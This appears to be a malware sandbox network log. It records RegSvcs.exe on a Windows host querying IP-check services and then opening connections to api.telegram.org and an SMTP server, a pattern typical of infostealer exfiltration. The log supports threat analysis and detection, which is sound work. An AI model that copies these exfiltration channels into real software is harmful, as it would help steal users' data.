                                                                    Sep 25, 2024 15:34:34.472245932 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:34.472323895 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:34.472502947 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:34.477282047 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:34.946387053 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:34.947911024 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.947972059 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.948061943 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.948424101 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.948436975 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.993401051 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.408077955 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.413256884 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:35.413335085 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.546947002 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.547041893 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.547095060 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:35.548012018 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:35.551122904 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.552189112 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.556924105 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:35.557468891 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.561271906 CEST8049735193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:35.561443090 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.561443090 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.566270113 CEST8049735193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:36.024744987 CEST8049735193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:36.026382923 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.026415110 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.026484966 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.026770115 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.026783943 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.071420908 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.482688904 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.484467030 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.484492064 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.632805109 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.632910013 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.632971048 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.633399010 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.636383057 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.637316942 CEST4973780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.641433001 CEST8049735193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:36.641508102 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.642146111 CEST8049737193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:36.642218113 CEST4973780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.642313957 CEST4973780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.647140980 CEST8049737193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:37.116503000 CEST8049737193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:37.117826939 CEST49738443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:37.117860079 CEST44349738188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:37.117949009 CEST49738443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:37.118200064 CEST49738443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:37.118213892 CEST44349738188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:37.165163994 CEST4973780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:37.588989019 CEST44349738188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:37.590833902 CEST49738443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:37.590873003 CEST44349738188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:37.736109972 CEST44349738188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:37.736200094 CEST44349738188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:37.736277103 CEST49738443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:37.736737013 CEST49738443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:37.739871025 CEST4973780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:37.741714001 CEST4973980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:37.745209932 CEST8049737193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:37.745356083 CEST4973780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:37.746985912 CEST8049739193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:37.747066975 CEST4973980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:37.747138023 CEST4973980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:37.751972914 CEST8049739193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:38.398482084 CEST8049739193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:38.400008917 CEST49740443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:38.400063992 CEST44349740188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:38.400137901 CEST49740443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:38.400412083 CEST49740443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:38.400425911 CEST44349740188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:38.416734934 CEST8049739193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:38.416819096 CEST4973980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:38.902406931 CEST44349740188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:38.904150009 CEST49740443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:38.904187918 CEST44349740188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:39.057833910 CEST44349740188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:39.057929039 CEST44349740188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:39.058060884 CEST49740443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:39.058569908 CEST49740443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:39.061604023 CEST4973980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:39.062612057 CEST4974180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:39.068701982 CEST8049739193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:39.068800926 CEST4973980192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:39.069072962 CEST8049741193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:39.069147110 CEST4974180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:39.069367886 CEST4974180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:39.074369907 CEST8049741193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:39.526000023 CEST8049741193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:39.527417898 CEST49742443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:39.527482033 CEST44349742188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:39.527616024 CEST49742443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:39.528083086 CEST49742443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:39.528100967 CEST44349742188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:39.571412086 CEST4974180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:40.004652977 CEST44349742188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:40.006540060 CEST49742443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:40.006577969 CEST44349742188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:40.423075914 CEST44349742188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:40.423368931 CEST44349742188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:40.423589945 CEST49742443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:40.423827887 CEST49742443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:40.426841974 CEST4974180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:40.428031921 CEST4974380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:40.432586908 CEST8049741193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:40.432684898 CEST4974180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:40.432857990 CEST8049743193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:40.432941914 CEST4974380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:40.433010101 CEST4974380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:40.438024044 CEST8049743193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:40.888156891 CEST8049743193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:40.889388084 CEST49744443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:40.889442921 CEST44349744188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:40.889516115 CEST49744443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:40.890233040 CEST49744443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:40.890242100 CEST44349744188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:40.930819988 CEST4974380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:41.362942934 CEST44349744188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:41.364790916 CEST49744443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:41.364811897 CEST44349744188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:41.510667086 CEST44349744188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:41.510911942 CEST44349744188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:41.510997057 CEST49744443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:41.511363029 CEST49744443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:41.520195007 CEST4974380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:41.521039009 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:41.521092892 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:41.521166086 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:41.521553040 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:41.521565914 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:41.525412083 CEST8049743193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:41.525475025 CEST4974380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:42.133115053 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:42.133250952 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:42.135411978 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:42.135422945 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:42.135680914 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:42.137406111 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:42.183448076 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:42.382025003 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:42.382112980 CEST44349745149.154.167.220192.168.2.5
                                                                    Sep 25, 2024 15:34:42.382245064 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:42.385351896 CEST49745443192.168.2.5149.154.167.220
                                                                    Sep 25, 2024 15:34:47.572478056 CEST4973180192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:47.697118998 CEST49746587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:47.702080965 CEST58749746208.91.198.143192.168.2.5
                                                                    Sep 25, 2024 15:34:47.702604055 CEST49746587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:50.920111895 CEST58749727208.91.198.143192.168.2.5
                                                                    Sep 25, 2024 15:34:50.920222044 CEST49727587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:50.923108101 CEST49727587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:34:50.928105116 CEST58749727208.91.198.143192.168.2.5
                                                                    Sep 25, 2024 15:35:09.075583935 CEST58749746208.91.198.143192.168.2.5
                                                                    Sep 25, 2024 15:35:09.075709105 CEST49746587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:35:09.077517986 CEST49746587192.168.2.5208.91.198.143
                                                                    Sep 25, 2024 15:35:09.082259893 CEST58749746208.91.198.143192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 25, 2024 15:34:12.536870003 CEST6134353192.168.2.51.1.1.1
                                                                    Sep 25, 2024 15:34:12.545280933 CEST53613431.1.1.1192.168.2.5
                                                                    Sep 25, 2024 15:34:13.240186930 CEST5634853192.168.2.51.1.1.1
                                                                    Sep 25, 2024 15:34:13.248141050 CEST53563481.1.1.1192.168.2.5
                                                                    Sep 25, 2024 15:34:22.668358088 CEST5001453192.168.2.51.1.1.1
                                                                    Sep 25, 2024 15:34:22.799654007 CEST53500141.1.1.1192.168.2.5
                                                                    Sep 25, 2024 15:34:29.530595064 CEST5389853192.168.2.51.1.1.1
                                                                    Sep 25, 2024 15:34:29.540354013 CEST53538981.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Sep 25, 2024 15:34:12.536870003 CEST192.168.2.51.1.1.10xdb38Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:13.240186930 CEST192.168.2.51.1.1.10xcf92Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:22.668358088 CEST192.168.2.51.1.1.10x497cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:29.530595064 CEST192.168.2.51.1.1.10x6792Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Sep 25, 2024 15:34:12.545280933 CEST1.1.1.1192.168.2.50xdb38No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:12.545280933 CEST1.1.1.1192.168.2.50xdb38No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:12.545280933 CEST1.1.1.1192.168.2.50xdb38No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:12.545280933 CEST1.1.1.1192.168.2.50xdb38No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:12.545280933 CEST1.1.1.1192.168.2.50xdb38No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:12.545280933 CEST1.1.1.1192.168.2.50xdb38No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:13.248141050 CEST1.1.1.1192.168.2.50xcf92No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:13.248141050 CEST1.1.1.1192.168.2.50xcf92No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:22.799654007 CEST1.1.1.1192.168.2.50x497cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:29.540354013 CEST1.1.1.1192.168.2.50x6792No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:29.540354013 CEST1.1.1.1192.168.2.50x6792No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:29.540354013 CEST1.1.1.1192.168.2.50x6792No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                    Sep 25, 2024 15:34:29.540354013 CEST1.1.1.1192.168.2.50x6792No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                    • reallyfreegeoip.org
                                                                    • api.telegram.org
                                                                    • checkip.dyndns.org
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549704193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:12.586656094 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:13.043016911 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:12 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 87e83b63c61315f3249a35b816613b3d
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                    Sep 25, 2024 15:34:13.047588110 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Sep 25, 2024 15:34:13.148109913 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:13 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 0e7c67361f00fd21856e185fd6d0fa0c
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                    Sep 25, 2024 15:34:13.919938087 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Sep 25, 2024 15:34:14.020360947 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:13 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 09949d6832773e2b2d51bb6d8490e2a5
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549707193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:14.685621977 CEST127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Sep 25, 2024 15:34:15.151278973 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:15 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: cf8e38c8673f9bc113881b082b988138
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549709193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:15.780987024 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:16.246324062 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:16 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 8d444e59cc68ea4eb9bc79a64bf54740
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549711193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:16.887588978 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:17.343688965 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:17 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 404485e228c9b471f4ca6ffbb97813d2
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549713193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:18.052330017 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:18.525022984 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:18 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5d592331bb4716070e42e098eeb28013
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.549715193.122.130.0806004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 25, 2024 15:34:19.135159969 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:19.612426043 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:19 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 6313c57bda31f24884e24845b54c7056
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
